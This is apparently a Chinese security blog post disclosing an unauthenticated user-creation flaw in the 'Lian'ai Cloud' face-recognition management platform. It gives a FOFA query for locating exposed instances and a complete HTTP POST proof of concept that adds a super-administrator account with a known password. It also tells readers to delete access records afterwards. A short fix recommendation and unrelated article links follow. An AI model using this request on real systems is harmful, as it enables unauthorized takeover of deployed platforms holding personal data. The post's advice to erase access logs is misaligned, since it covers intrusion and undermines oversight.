脸爱云一脸通智慧管理平台未授权访问

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞概述

脸爱云一脸通智慧管理平台存在严重漏洞,允许攻击者通过未经授权的访问,在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户,提升权限,或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问,危及用户隐私和整体系统安全。

二、fofa

title=="欢迎使用脸爱云 一脸通智慧管理平台"

三、漏洞复现

poc

html 复制代码
POST /SystemMng.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

operatorName=test&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

抓包,重放

然后就会创建一个账号为test,密码为123456的超级管理员。

登录

最后记得删除访问记录,不要对别人造成任何影响

四、修复意见

为确保系统安全,强烈建议立即修复漏洞,加强用户添加功能的输入验证和访问控制,以限制仅授权用户能够执行此操作。

相关推荐
H轨迹H5 小时前
BUUCTF-Web方向21-25wp
网络安全·渗透测试·ctf
网安Ruler7 小时前
靶场之路-Kioptix Level-1 mod_ssl 缓冲区溢出漏洞
网络·网络协议·网络安全·ssl
Werqy310 小时前
burpsuite保姆级安装教程
网络安全
underatted1 天前
2025tg最新免费社工库机器人
web安全·网络安全
H轨迹H1 天前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
黑客笔记1 天前
ChatGPT超级AI对话模型 黑客十问十答
人工智能·web安全·网络安全
你怎么睡得着的!2 天前
【护网行动-红蓝攻防】第一章-红蓝对抗基础 认识红蓝紫
网络·安全·web安全·网络安全
anddddoooo2 天前
域内证书维权
服务器·网络·网络协议·安全·网络安全·https·ssl
顾比魁2 天前
pikachu之CSRF防御:给你的请求加上“网络身份证”
前端·网络·网络安全·csrf
廾匸07052 天前
《95015网络安全应急响应分析报告(2024)》
网络安全·行业报告·应急响应